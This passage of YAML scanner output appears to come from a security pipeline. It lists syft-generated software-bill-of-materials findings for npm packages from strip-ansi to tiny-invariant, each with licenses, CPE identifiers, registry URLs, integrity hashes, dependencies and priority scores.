cpe:2.3:a:strip:strip-ansi:6.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:strip:strip_ansi:6.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/strip-ansi@6.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz integrity: sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A== dependencies: ansi-regex: ^5.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ca95150df82b38c3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: strip-ansi 7.2.0' title: strip-ansi 7.2.0 description: 'Package discovered: strip-ansi 7.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: efdaea275ca01865 name: strip-ansi version: 7.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:strip-ansi:strip-ansi:7.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:strip-ansi:strip_ansi:7.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:strip_ansi:strip-ansi:7.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:strip_ansi:strip_ansi:7.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:strip:strip-ansi:7.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:strip:strip_ansi:7.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/strip-ansi@7.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.2.0.tgz integrity: sha512-yDPMNjp4WyfYBkHnjIRLfca1i6KMyGCtsVgoKe/z1+6vukgaENdgGBZt+ZmKPc4gavvEZ5OgHfHdrazhgNyG7w== dependencies: ansi-regex: ^6.2.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 680b8434591c36cc ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: strnum 2.2.3' title: strnum 2.2.3 description: 'Package discovered: strnum 2.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9368f059f77a6fca name: strnum version: 2.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:strnum:strnum:2.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/strnum@2.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/strnum/-/strnum-2.2.3.tgz integrity: sha512-oKx6RUCuHfT3oyVjtnrmn19H1SiCqgJSg+54XqURKp5aCMbrXrhLjRN9TjuwMjiYstZ0MzDrHqkGZ5dFTKd+zg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 71b1b284c1af24b8 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: stubs 3.0.0' title: stubs 3.0.0 description: 'Package discovered: stubs 3.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 10401a0421b092a3 name: stubs version: 3.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:stubs:stubs:3.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/stubs@3.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/stubs/-/stubs-3.0.0.tgz integrity: sha512-PdHt7hHUJKxvTCgbKX9C1V/ftOcjJQgz8BZwNfV5c4B6dcGqlpelTbJ999jBGZ2jYiPAwcX5dP6oBwVlBlUbxw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a4561300304da31c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: styled-jsx 5.1.1' title: styled-jsx 5.1.1 description: 'Package discovered: styled-jsx 5.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b71f2c964dcb79d3 name: styled-jsx version: 5.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:styled-jsx:styled-jsx:5.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:styled-jsx:styled_jsx:5.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:styled_jsx:styled-jsx:5.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:styled_jsx:styled_jsx:5.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:styled:styled-jsx:5.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:styled:styled_jsx:5.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/styled-jsx@5.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/styled-jsx/-/styled-jsx-5.1.1.tgz integrity: sha512-pW7uC1l4mBZ8ugbiZrcIsiIvVx1UmTfw7UkC3Um2tmfUq9Bhk8IiyEIPl6F8agHgjzku6j0xQEZbfA5uSgSaCw== dependencies: client-only: 0.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d085117a189c2037 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: sucrase 3.35.1' title: sucrase 3.35.1 description: 'Package discovered: sucrase 3.35.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 302884898f3a35c4 name: sucrase version: 3.35.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:sucrase:sucrase:3.35.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/sucrase@3.35.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/sucrase/-/sucrase-3.35.1.tgz integrity: sha512-DhuTmvZWux4H1UOnWMB3sk0sbaCVOoQZjv8u1rDoTV0HTdGem9hkAZtl4JZy8P2z4Bg0nT+YMeOFyVr4zcG5Tw== dependencies: '@jridgewell/gen-mapping': ^0.3.2 commander: ^4.0.0 lines-and-columns: ^1.1.6 mz: ^2.7.0 pirates: ^4.0.1 tinyglobby: ^0.2.11 ts-interface-checker: ^0.1.9 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 57ae1f3ed312e075 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: supports-preserve-symlinks-flag 1.0.0' title: supports-preserve-symlinks-flag 1.0.0 description: 'Package discovered: supports-preserve-symlinks-flag 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: cb6982ee071dbb85 name: supports-preserve-symlinks-flag version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:supports-preserve-symlinks-flag:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:supports-preserve-symlinks-flag:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:supports_preserve_symlinks_flag:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:supports_preserve_symlinks_flag:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:supports-preserve-symlinks:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:supports-preserve-symlinks:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:supports_preserve_symlinks:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:supports_preserve_symlinks:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:supports-preserve:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:supports-preserve:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:supports_preserve:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:supports_preserve:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:supports:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:supports:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/supports-preserve-symlinks-flag@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz integrity: sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7b659eb857ace717 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: svg-arc-to-cubic-bezier 3.2.0' title: svg-arc-to-cubic-bezier 3.2.0 description: 'Package discovered: svg-arc-to-cubic-bezier 3.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 03465a3bffd322b9 name: svg-arc-to-cubic-bezier version: 3.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:svg-arc-to-cubic-bezier:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg-arc-to-cubic-bezier:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg_arc_to_cubic_bezier:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg_arc_to_cubic_bezier:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg-arc-to-cubic:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg-arc-to-cubic:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg_arc_to_cubic:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg_arc_to_cubic:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg-arc-to:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg-arc-to:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg_arc_to:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg_arc_to:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg-arc:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg-arc:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg_arc:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg_arc:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:svg:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/svg-arc-to-cubic-bezier@3.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/svg-arc-to-cubic-bezier/-/svg-arc-to-cubic-bezier-3.2.0.tgz integrity: sha512-djbJ/vZKZO+gPoSDThGNpKDO+o+bAeA4XQKovvkNCqnIS2t+S4qnLAGQhyyrulhCFRl1WWzAp0wUDV8PpTVU3g== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0702fc96b298768b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: tailwindcss 3.4.19' title: tailwindcss 3.4.19 description: 'Package discovered: tailwindcss 3.4.19' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4180007fa4dbcaa3 name: tailwindcss version: 3.4.19 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:tailwindcss:tailwindcss:3.4.19:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/tailwindcss@3.4.19 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/tailwindcss/-/tailwindcss-3.4.19.tgz integrity: sha512-3ofp+LL8E+pK/JuPLPggVAIaEuhvIz4qNcf3nA1Xn2o/7fb7s/TYpHhwGDv1ZU3PkBluUVaF8PyCHcm48cKLWQ== dependencies: '@alloc/quick-lru': ^5.2.0 arg: ^5.0.2 chokidar: ^3.6.0 didyoumean: ^1.2.2 dlv: ^1.1.3 fast-glob: ^3.3.2 glob-parent: ^6.0.2 is-glob: ^4.0.3 jiti: ^1.21.7 lilconfig: ^3.1.3 micromatch: ^4.0.8 normalize-path: ^3.0.0 object-hash: ^3.0.0 picocolors: ^1.1.1 postcss: ^8.4.47 postcss-import: ^15.1.0 postcss-js: ^4.0.1 postcss-load-config: ^4.0.2 || ^5.0 || ^6.0 postcss-nested: ^6.2.0 postcss-selector-parser: ^6.1.2 resolve: ^1.22.8 sucrase: ^3.35.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1167979aa3e3af06 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: teeny-request 9.0.0' title: teeny-request 9.0.0 description: 'Package discovered: teeny-request 9.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 5100f72eed8a2178 name: teeny-request version: 9.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:teeny-request:teeny-request:9.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:teeny-request:teeny_request:9.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:teeny_request:teeny-request:9.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:teeny_request:teeny_request:9.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:teeny:teeny-request:9.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:teeny:teeny_request:9.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/teeny-request@9.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/teeny-request/-/teeny-request-9.0.0.tgz integrity: sha512-resvxdc6Mgb7YEThw6G6bExlXKkv6+YbuzGg9xuXxSgxJF7Ozs+o8Y9+2R3sArdWdW8nOokoQb1yrpFB0pQK2g== dependencies: http-proxy-agent: ^5.0.0 https-proxy-agent: ^5.0.0 node-fetch: ^2.6.9 stream-events: ^1.0.5 uuid: ^9.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b4e9549620686503 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: thenify 3.3.1' title: thenify 3.3.1 description: 'Package discovered: thenify 3.3.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9fd87e687c3b74ca name: thenify version: 3.3.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:thenify:thenify:3.3.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/thenify@3.3.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/thenify/-/thenify-3.3.1.tgz integrity: sha512-RVZSIV5IG10Hk3enotrhvz0T9em6cyHBLkH/YAZuKqd8hRkKhSfCGIcP2KUY0EPxndzANBmNllzWPwak+bheSw== dependencies: any-promise: ^1.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a439c679c65c98cd ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: thenify-all 1.6.0' title: thenify-all 1.6.0 description: 'Package discovered: thenify-all 1.6.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 845b1699e3aa7533 name: thenify-all version: 1.6.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:thenify-all:thenify-all:1.6.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:thenify-all:thenify_all:1.6.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:thenify_all:thenify-all:1.6.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:thenify_all:thenify_all:1.6.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:thenify:thenify-all:1.6.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:thenify:thenify_all:1.6.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/thenify-all@1.6.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/thenify-all/-/thenify-all-1.6.0.tgz integrity: sha512-RNxQH/qI8/t3thXJDwcstUO4zeqo64+Uy/+sNVRBx4Xn2OX+OZ9oP+iJnNFqplFra2ZUVeKCSa2oVWi3T4uVmA== dependencies: thenify: '>= 3.1.0 < 4' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e5c0090ac7c6baa4 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: thirty-two 1.0.2' title: thirty-two 1.0.2 description: 'Package discovered: thirty-two 1.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f3444a348db654fb name: thirty-two version: 1.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:thirty-two:thirty-two:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:thirty-two:thirty_two:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:thirty_two:thirty-two:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:thirty_two:thirty_two:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:thirty:thirty-two:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:thirty:thirty_two:1.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/thirty-two@1.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/thirty-two/-/thirty-two-1.0.2.tgz integrity: sha512-OEI0IWCe+Dw46019YLl6V10Us5bi574EvlJEOcAkB29IzQ/mYD1A6RyNHLjZPiHCmuodxvgF6U+vZO1L15lxVA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ed31df7df590fd3e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: tiny-inflate 1.0.3' title: tiny-inflate 1.0.3 description: 'Package discovered: tiny-inflate 1.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 8a9f89a30def4776 name: tiny-inflate version: 1.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:tiny-inflate:tiny-inflate:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:tiny-inflate:tiny_inflate:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:tiny_inflate:tiny-inflate:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:tiny_inflate:tiny_inflate:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:tiny:tiny-inflate:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:tiny:tiny_inflate:1.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/tiny-inflate@1.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/tiny-inflate/-/tiny-inflate-1.0.3.tgz integrity: sha512-pkY1fj1cKHb2seWDy0B16HeWyczlJA9/WW3u3c4z/NiWDsO3DOU5D7nhTLE9CF0yXv/QZFY7sEJmj24dK+Rrqw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 99c39b0d16665208 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: tiny-invariant 1.3.3' title: tiny-invariant 1.3.3 description: 'Package discovered: tiny-invariant 1.3.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 509a74e9f8ec9c11 name: tiny-invariant version: 1.3.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:tiny-invariant:tiny-invariant:1.3.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:tiny-invariant:tiny_invariant:1.3.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:tiny_invariant:tiny-invariant:1.3.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:tiny_invariant:tiny_invariant:1.3.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:tiny:tiny-invariant:1.3.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:tiny:tiny_invariant:1.3.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/tiny-invariant@1.3.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/tiny-invariant/-/tiny-invariant-1.3.3.tgz integrity: sha512-+FbBPE1o9QAYvviau/qC5SE3caw21q3xkvWKBtja5vgqOWIHHJ3ioaq1VPfn/Szqctz2bU/oYeKd9/z5BL+PVg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: 